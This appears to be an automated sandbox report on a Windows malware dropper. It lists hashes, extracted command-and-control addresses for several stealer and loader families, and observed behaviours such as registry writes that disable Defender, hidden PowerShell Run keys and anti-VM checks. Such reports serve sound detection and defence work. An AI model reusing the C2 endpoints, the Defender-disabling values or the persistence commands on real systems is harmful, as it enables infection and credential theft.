Analysis
-
max time kernel
306s -
max time network
315s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
25/10/2023, 04:52
Static task
static1
Behavioral task
behavioral1
Sample
3GW56sB.exe
Resource
win7-20231020-en
General
-
Target
3GW56sB.exe
-
Size
897KB
-
MD5
2e3f17e7e9001ff7b7cf8ab412462a48
-
SHA1
2a49c0e715ecd73ccd9d0fcfb21de36cc3ee03ba
-
SHA256
674e07c8188ea9be50a002c9850c7704541b44b35adc7528216dc73dd4a531b8
-
SHA512
d42e8a4801f1c73733b37efb5ae17f321bd5463829ab9283566f38882624e284ff4c7c53b212c35ca53f9de825625a455393012ffbdc0e4caebd178fc716ee27
-
SSDEEP
12288:FFx32KaPenADS7R9hSYDqmUopDKO/3pVW5ZNJQ8xYurJGW7Z:HJIPenyS7R9hJDq0uO/DiZR
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
kinza
77.91.124.86:19084
Extracted
redline
grome
77.91.124.86:19084
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Extracted
raccoon
6a6a005b9aa778f606280c5fa24ae595
http://195.123.218.98:80
http://31.192.23
-
user_agent
SunShineMoonLight
Signatures
-
DcRat 17 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 2576 schtasks.exe 2792 schtasks.exe 2936 schtasks.exe 2848 schtasks.exe 3012 schtasks.exe 2736 schtasks.exe 2808 schtasks.exe 1680 schtasks.exe 2616 schtasks.exe 3056 schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe 1988 schtasks.exe 2952 schtasks.exe 112 schtasks.exe 1704 schtasks.exe 1736 schtasks.exe 948 schtasks.exe -
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral1/memory/2208-1175-0x0000000000A70000-0x0000000000E50000-memory.dmp family_zgrat_v1 -
Glupteba payload 10 IoCs
resource yara_rule behavioral1/memory/964-976-0x0000000002BC0000-0x00000000034AB000-memory.dmp family_glupteba behavioral1/memory/964-978-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/964-1053-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/964-1083-0x0000000002BC0000-0x00000000034AB000-memory.dmp family_glupteba behavioral1/memory/964-1087-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/964-1089-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/964-1291-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/2352-1349-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/2352-1515-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral1/memory/2300-1645-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" E9B7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" E9B7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" E9B7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" E9B7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" E9B7.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection E9B7.exe -
Raccoon Stealer payload 4 IoCs
resource yara_rule behavioral1/memory/1344-1614-0x0000000000400000-0x000000000041B000-memory.dmp family_raccoon behavioral1/memory/1344-1633-0x0000000000400000-0x000000000041B000-memory.dmp family_raccoon behavioral1/memory/1344-1635-0x0000000000400000-0x000000000041B000-memory.dmp family_raccoon behavioral1/memory/1344-1639-0x0000000000400000-0x000000000041B000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 10 IoCs
resource yara_rule behavioral1/files/0x0006000000016d85-98.dat family_redline behavioral1/files/0x0006000000016d85-102.dat family_redline behavioral1/files/0x0006000000016d85-101.dat family_redline behavioral1/files/0x0006000000016d85-103.dat family_redline behavioral1/files/0x0007000000016fe9-113.dat family_redline behavioral1/files/0x0007000000016fe9-115.dat family_redline behavioral1/memory/1480-125-0x0000000001330000-0x000000000136E000-memory.dmp family_redline behavioral1/memory/2516-127-0x00000000011B0000-0x00000000011EE000-memory.dmp family_redline behavioral1/memory/108-956-0x0000000000480000-0x00000000004DA000-memory.dmp family_redline behavioral1/memory/108-957-0x0000000000400000-0x000000000047E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 2940 created 1204 2940 latestX.exe 18 PID 2940 created 1204 2940 latestX.exe 18 PID 2940 created 1204 2940 latestX.exe 18 PID 2940 created 1204 2940 latestX.exe 18 PID 2940 created 1204 2940 latestX.exe 18 PID 1556 created 1204 1556 updater.exe 18 PID 1556 created 1204 1556 updater.exe 18 PID 1556 created 1204 1556 updater.exe 18 PID 1556 created 1204 1556 updater.exe 18 PID 1556 created 1204 1556 updater.exe 18 PID 1556 created 1204 1556 updater.exe 18 -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nBRnpywzcTvqknVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths windefender.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0" rnYrbGM.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oVhJPNkDU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths schtasks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths rnYrbGM.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oVhJPNkDU = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nBRnpywzcTvqknVB = "0" schtasks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" windefender.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 186 1696 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 568 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Control Panel\International\Geo\Nation rnYrbGM.exe -
Executes dropped EXE 44 IoCs
pid Process 2756 DE1F.exe 2604 Rl0Uz9HJ.exe 1492 E042.exe 2620 vk8qw0bZ.exe 1824 TM0pC3TM.exe 784 YD6bx5XP.exe 1344 1Dk37rF7.exe 2516 2Jf821dM.exe 1480 E86F.exe 2060 E9B7.exe 1648 EB6D.exe 1224 explothe.exe 3032 80CA.exe 3068 8398.exe 2108 toolspub2.exe 964 31839b57a4f11171d6abc8bbc4451ee4.exe 108 85FA.exe 1004 toolspub2.exe 2392 setup.exe 2344 TrustedInstaller.exe 2908 set16.exe 2940 latestX.exe 1460 K.exe 292 is-RV8TA.tmp 2508 Install.exe 456 Install.exe 2192 MyBurn.exe 2412 MyBurn.exe 2924 explothe.exe 840 E653.exe 2208 EF49.exe 2352 31839b57a4f11171d6abc8bbc4451ee4.exe 2300 csrss.exe 1624 injector.exe 276 patch.exe 1556 updater.exe 2960 explothe.exe 2896 XyJMdiY.exe 2968 rnYrbGM.exe 2544 windefender.exe 3044 windefender.exe 1356 explothe.exe 1964 f801950a962ddba14caaa44bf084b55c.exe 936 explothe.exe -
Loads dropped DLL 64 IoCs
pid Process 2756 DE1F.exe 2756 DE1F.exe 2604 Rl0Uz9HJ.exe 2604 Rl0Uz9HJ.exe 2620 vk8qw0bZ.exe 2620 vk8qw0bZ.exe 1824 TM0pC3TM.exe 1824 TM0pC3TM.exe 784 YD6bx5XP.exe 784 YD6bx5XP.exe 784 YD6bx5XP.exe 1344 1Dk37rF7.exe 784 YD6bx5XP.exe 2516 2Jf821dM.exe 1648 EB6D.exe 3032 80CA.exe 3032 80CA.exe 3032 80CA.exe 3032 80CA.exe 3032 80CA.exe 2108 toolspub2.exe 108 85FA.exe 108 85FA.exe 2580 WerFault.exe 2580 WerFault.exe 2392 setup.exe 2392 setup.exe 2392 setup.exe 3032 80CA.exe 3032 80CA.exe 2344 TrustedInstaller.exe 2908 set16.exe 2908 set16.exe 2908 set16.exe 2344 TrustedInstaller.exe 2908 set16.exe 2392 setup.exe 2508 Install.exe 2508 Install.exe 2508 Install.exe 292 is-RV8TA.tmp 292 is-RV8TA.tmp 292 is-RV8TA.tmp 292 is-RV8TA.tmp 2508 Install.exe 456 Install.exe 456 Install.exe 456 Install.exe 292 is-RV8TA.tmp 2192 MyBurn.exe 2192 MyBurn.exe 2580 WerFault.exe 1552 rundll32.exe 1552 rundll32.exe 1552 rundll32.exe 1552 rundll32.exe 292 is-RV8TA.tmp 2412 MyBurn.exe 2412 MyBurn.exe 1204 Explorer.EXE 2352 31839b57a4f11171d6abc8bbc4451ee4.exe 2352 31839b57a4f11171d6abc8bbc4451ee4.exe 2208 EF49.exe 2300 csrss.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0006000000012118-2162.dat upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 51.159.66.125 -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features E9B7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths windefender.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths rnYrbGM.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" E9B7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0" rnYrbGM.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" windefender.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" YD6bx5XP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\8398.exe'\"" 8398.exe Set value (str) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" DE1F.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Rl0Uz9HJ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" vk8qw0bZ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" TM0pC3TM.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json rnYrbGM.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json rnYrbGM.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 2692 bcdedit.exe -
Drops file in System32 directory 22 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rnYrbGM.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA rnYrbGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 rnYrbGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 rnYrbGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 rnYrbGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB rnYrbGM.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini XyJMdiY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA rnYrbGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA rnYrbGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA rnYrbGM.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol rnYrbGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 rnYrbGM.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol XyJMdiY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB rnYrbGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1028 set thread context of 2376 1028 3GW56sB.exe 27 PID 2108 set thread context of 1004 2108 toolspub2.exe 69 PID 2208 set thread context of 1344 2208 EF49.exe 127 PID 840 set thread context of 2044 840 E653.exe 156 PID 1556 set thread context of 1392 1556 updater.exe 186 PID 1556 set thread context of 1940 1556 updater.exe 188 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Program Files directory 27 IoCs
description ioc Process File created C:\Program Files (x86)\MyBurn\is-AHNNI.tmp is-RV8TA.tmp File created C:\Program Files (x86)\MyBurn\is-OQJNP.tmp is-RV8TA.tmp File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak rnYrbGM.exe File created C:\Program Files (x86)\MyBurn\Sounds\is-T9UMU.tmp is-RV8TA.tmp File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe is-RV8TA.tmp File created C:\Program Files\Google\Libs\WR64.sys updater.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja rnYrbGM.exe File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\FiLamXz.xml rnYrbGM.exe File created C:\Program Files (x86)\KrPQunXfXpAVC\ZVQPMdm.dll rnYrbGM.exe File created C:\Program Files (x86)\KrPQunXfXpAVC\CmDSpJW.xml rnYrbGM.exe File created C:\Program Files (x86)\MyBurn\is-E6N9O.tmp is-RV8TA.tmp File created C:\Program Files (x86)\MyBurn\is-RUSBS.tmp is-RV8TA.tmp File created C:\Program Files (x86)\oVhJPNkDU\OaUGos.dll rnYrbGM.exe File created C:\Program Files (x86)\oVhJPNkDU\UmeXljG.xml rnYrbGM.exe File created C:\Program Files (x86)\DlbZONUGhjVU2\FOGaKUMGeoGsF.dll rnYrbGM.exe File created C:\Program Files (x86)\MyBurn\is-ULOE7.tmp is-RV8TA.tmp File created C:\Program Files (x86)\MyBurn\is-RU26N.tmp is-RV8TA.tmp File created C:\Program Files\Google\Chrome\updater.exe latestX.exe File created C:\Program Files (x86)\MyBurn\Sounds\is-D6F56.tmp is-RV8TA.tmp File created C:\Program Files (x86)\DlbZONUGhjVU2\KTksFys.xml rnYrbGM.exe File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\vXdyDiw.dll rnYrbGM.exe File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat is-RV8TA.tmp File created C:\Program Files (x86)\MyBurn\unins000.dat is-RV8TA.tmp File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi rnYrbGM.exe File created C:\Program Files (x86)\MyBurn\is-1OQEA.tmp is-RV8TA.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi rnYrbGM.exe File created C:\Program Files (x86)\GpfcWYRxKqUn\KZgXwNf.dll rnYrbGM.exe -
Drops file in Windows directory 10 IoCs
